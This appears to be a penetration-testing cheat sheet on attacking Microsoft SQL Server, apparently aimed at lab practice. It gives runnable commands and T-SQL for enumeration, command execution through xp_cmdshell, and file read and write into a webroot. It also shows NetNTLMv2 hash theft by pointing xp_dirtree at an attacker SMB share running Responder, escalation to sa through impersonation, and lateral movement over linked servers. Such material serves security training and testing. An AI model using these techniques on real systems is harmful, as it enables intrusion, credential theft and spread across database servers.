MSSQL
Introduction
Microsoft SQL Server (MSSQL) is Microsoft's relational database management system. By default the database engine listens on TCP port 1433 (the SQL Server Browser service, which locates named instances, answers on UDP 1434).
MSSQL Enumeration & Connection to the Server
Enumeration with Nmap NSE:
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
Log in to the MSSQL server using Windows authentication:
mssqlclient.py <user>@<FQDN/IP> -windows-auth
Connect to the MSSQL Server using sqlcmd:
sqlcmd -S SRVMSSQL -U validuser -P validpassword -y 30 -Y 30
Connect to the MSSQL Server using sqsh:
sqsh -S 10.129.203.7 -U validuser -P validpassword -h
Connect using a local Windows account:
sqsh -S 10.129.203.7 -U .\\validuser -P validpassword -h
Interacting with a MSSQL Server
| Command | Description |
|---|---|
| SELECT name FROM master.dbo.sysdatabases | Show databases |
| USE users | Switch to the database "users" |
| SELECT table_name FROM users.INFORMATION_SCHEMA.TABLES | Show tables in the database "users" |
| SELECT * FROM users | Select all rows from the table "users" |
MSSQL Command Execution
MSSQL can allow operating system command execution through the xp_cmdshell extended stored procedure:
xp_cmdshell 'whoami'
The commands run with the privileges of the SQL Server service account, not those of the login that issued them.
Enabling xp_cmdshell: xp_cmdshell is disabled by default. If it is disabled, a login that holds ALTER SETTINGS (for example a sysadmin) can re-enable it through sp_configure; Impacket's mssqlclient.py exposes the same change as its enable_xp_cmdshell command.
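The following T-SQL is an added example, not code from the original page: it turns xp_cmdshell on via sp_configure, confirms the running value, and executes a command. It assumes the current login has the ALTER SETTINGS server permission (sysadmin or serveradmin).

```sql
-- Added example (not from the original page): enable xp_cmdshell and run a command.
-- sp_configure needs ALTER SETTINGS (sysadmin/serveradmin); xp_cmdshell is an
-- "advanced option", so advanced options must be exposed first.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Confirm the change: run_value must be 1, otherwise RECONFIGURE was not applied
EXEC sp_configure 'xp_cmdshell';

-- Execute a command; stdout comes back as a result set, one row per output line.
-- The identity printed is the SQL Server service account, whatever login you used.
EXEC master..xp_cmdshell 'whoami';
EXEC master..xp_cmdshell 'whoami /priv';
```

If the service runs as a low-privileged virtual account the output will show something like NT Service\MSSQLSERVER; the privileges listed by whoami /priv tell you whether the account is worth abusing further.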
MSSQL File Read
We can read any file to which the SQL Server service account has read access using the following query (the executing login needs the ADMINISTER BULK OPERATIONS permission, which the bulkadmin and sysadmin roles hold):
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
MSSQL File Write
To write files using MSSQL, we need to enable Ole Automation Procedures, which requires the ALTER SETTINGS server permission (sysadmin). The file is created by the SQL Server service account, so it must have write access to the target path.
After that, we need to execute the sp_OA* stored procedures to create the file:
Enable Ole Automation Procedures:
Create a File:
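The following T-SQL is an added example and not code from the original page: it enables Ole Automation Procedures, then uses the sp_OACreate / sp_OAMethod / sp_OADestroy stored procedures to drive the Scripting.FileSystemObject COM object and write a line to a file. The path and contents are placeholders; the final SELECT re-reads the file with the OPENROWSET technique from the previous section to prove the write landed.

```sql
-- Added example (not from the original page). Path and contents are placeholders.
-- sp_configure needs ALTER SETTINGS; the file is written as the SQL Server service account.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

DECLARE @OLE INT;      -- handle to the FileSystemObject instance
DECLARE @FileID INT;   -- handle to the TextStream returned by OpenTextFile
DECLARE @hr INT;       -- HRESULT of each COM call (0 = success)

-- Instantiate the COM object
EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @OLE;   -- surface the COM error instead of failing silently
    RETURN;
END;

-- OpenTextFile(path, iomode, create): 8 = ForAppending, 1 = create the file if missing
EXEC @hr = sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'C:\inetpub\wwwroot\test.txt', 8, 1;
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @OLE;
    EXEC sp_OADestroy @OLE;
    RETURN;
END;

-- WriteLine has no return value, hence NULL in the return-value slot
EXEC sp_OAMethod @FileID, 'WriteLine', NULL, 'written via sp_OAMethod';

-- Release both COM handles
EXEC sp_OADestroy @FileID;
EXEC sp_OADestroy @OLE;

-- Verify the write using the file-read technique from the previous section
SELECT * FROM OPENROWSET(BULK N'C:/inetpub/wwwroot/test.txt', SINGLE_CLOB) AS Contents;
```

Checking @hr after each call matters: a failed sp_OACreate returns a non-zero HRESULT rather than raising an error, so without the check the batch silently continues with an invalid handle.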
Capture MSSQL Service Hash
It's possible to capture the NetNTLMv2 challenge-response of the MSSQL service account using a fake SMB server or Responder, then crack it offline.
When the xp_dirtree or xp_subdirs stored procedures are pointed at a UNC path on our fake SMB server, the SQL Server service is forced to authenticate to that share with the service account's credentials, leaking its NetNTLMv2 hash. If the service runs as a virtual or machine account, the machine account authenticates instead.
Follow these steps:
Start Responder or start a fake SMB server (10.10.110.17 below is the attacker's address):
sudo responder -I tun0
or
sudo impacket-smbserver share ./ -smb2support
Hash stealing through xp_dirtree:
EXEC master..xp_dirtree '\\10.10.110.17\share\'
Hash stealing through xp_subdirs:
EXEC master..xp_subdirs '\\10.10.110.17\share\'
MSSQL - Impersonate Existing Users
SQL Server has a special permission, named IMPERSONATE, that allows the executing login to take on the permissions of another user or login until the context is reset (REVERT) or the session ends.
To impersonate a login:
Verify whether the current login is a sysadmin (by default, sysadmins can impersonate any login):
Identify the logins that we can impersonate:
Impersonate a login (example: sa):
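The following T-SQL is an added example covering the three steps above in one script; it is not code from the original page. It assumes the current login has been granted IMPERSONATE on the sa login. Note that for IMPERSONATE on a login, sys.server_permissions records the target login in major_id (class SERVER_PRINCIPAL); grantor_principal_id only records who issued the GRANT, so joining on it, as some cheat sheets do, lists the grantor rather than the login you can become.

```sql
-- Added example (not from the original page). Assumes IMPERSONATE on login 'sa' was granted.

-- 1. Who am I, and am I already a sysadmin? (1 = yes, 0 = no, NULL = role not found)
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Which logins may the current login impersonate?
--    major_id holds the login that can be impersonated; grantee_principal_id is who
--    received the permission. Drop the grantee filter to list every IMPERSONATE grant.
SELECT p.name AS impersonable_login
FROM sys.server_permissions sp
JOIN sys.server_principals p ON sp.major_id = p.principal_id
WHERE sp.permission_name = 'IMPERSONATE'
  AND sp.class_desc = 'SERVER_PRINCIPAL'
  AND sp.grantee_principal_id = SUSER_ID();

-- 3. Switch execution context to sa and confirm the elevated role
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Everything from here runs as sa, e.g. sp_configure to enable xp_cmdshell
-- or OPENROWSET(BULK ...) to read files.

-- 4. Return to the original login; without REVERT the impersonation lasts for the session
REVERT;
SELECT SYSTEM_USER AS login_name;
```

EXECUTE AS LOGIN switches the server-level context, so server roles such as sysadmin come with it; EXECUTE AS USER only switches the database user and will not grant sysadmin even if the underlying login has it.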
Communicating with Other Databases [Linked Servers]
MSSQL has a configuration option called linked servers, which lets one instance run queries against another database server.
If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.
Administrators often configure a linked server with a fixed set of credentials for the remote server, and every local login allowed to use the link runs with that remote identity.
If those credentials have sysadmin privileges on the remote instance, we may be able to execute commands there.
Follow these steps:
Identify Linked Servers in MSSQL:
SELECT srvname, isremote FROM sysservers
Identify the user for the connection and its privileges:
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.10.10.100\SQLSERVERNAME]
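The following T-SQL is an added example, not code from the original page, that carries the linked-server procedure through to command execution on the remote instance. The linked server name reuses the placeholder from above. It assumes the link's credential is sysadmin on the remote side; the sp_serveroption call needs ALTER ANY LINKED SERVER locally and is only required when the link was created without the rpc out option.

```sql
-- Added example (not from the original page). Linked server name is a placeholder.
-- EXECUTE ... AT sends a batch over RPC, so the link must have 'rpc out' enabled;
-- otherwise the call fails with "Server '...' is not configured for RPC".
-- A login with ALTER ANY LINKED SERVER can turn it on if needed:
EXEC sp_serveroption @server  = N'10.10.10.100\SQLSERVERNAME',
                     @optname = N'rpc out',
                     @optvalue = N'true';

-- Check what identity the link logs in as and whether it is sysadmin on the remote side
EXECUTE('SELECT @@servername, system_user, is_srvrolemember(''sysadmin'')')
    AT [10.10.10.100\SQLSERVERNAME];

-- If it is sysadmin, enable xp_cmdshell on the remote instance. The string is executed
-- remotely, so inner single quotes are doubled to survive the outer quoting.
EXECUTE('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;')
    AT [10.10.10.100\SQLSERVERNAME];
EXECUTE('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')
    AT [10.10.10.100\SQLSERVERNAME];

-- Run a command on the remote host; output comes back as a result set
EXECUTE('EXEC master..xp_cmdshell ''whoami''')
    AT [10.10.10.100\SQLSERVERNAME];

-- Links can chain: enumerate the remote instance's own linked servers for the next hop
EXECUTE('SELECT srvname, isremote FROM sysservers')
    AT [10.10.10.100\SQLSERVERNAME];
```

Where rpc out cannot be enabled, OPENQUERY over the same link still works for SELECT statements but cannot carry the sp_configure and xp_cmdshell calls shown here.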